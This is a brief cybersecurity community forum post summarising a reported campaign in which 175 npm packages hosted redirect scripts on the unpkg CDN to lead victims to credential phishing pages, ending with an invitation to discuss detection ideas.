Oct 11 • Cybersecurity News
175 Malicious npm Packages Abused for Credential Phishing
Recently, researchers discovered 175 malicious npm packages (with ~26,000 downloads) being used in a credential phishing campaign — not to infect developers, but to host phishing redirects using the npm registry + unpkg CDN.
Instead of running malicious code on install, these packages stored HTML/JS redirectors that sent victims to phishing pages with their email pre-filled to look more legitimate.
This shows how attackers are now abusing trusted developer platforms (like npm and CDNs) to host phishing infrastructure — blurring the line between supply chain attacks and social engineering.
🔍 Key Highlights:
- 175 npm packages acting as redirect hosts
- ~26,000 total downloads
- Infrastructure abuse via npm + unpkg CDN
- Targets include tech, industrial, and energy companies
- Phishing pages look more convincing (pre-filled emails)
💭 What do you think?
Drop your thoughts below — especially if you’ve seen npm/CDN abuse or have ideas for detection strategies.
Let’s make this an actionable learning thread!!
1
0 comments
175 Malicious npm Packages Abused for Credential Phishing
powered by
skool.com/secureshield-academy-7117
Welcome to the #1 Cyber Guard Academy the ultimate community for small business owners, students, and future cybersecurity professionals.
Suggested communities
Powered by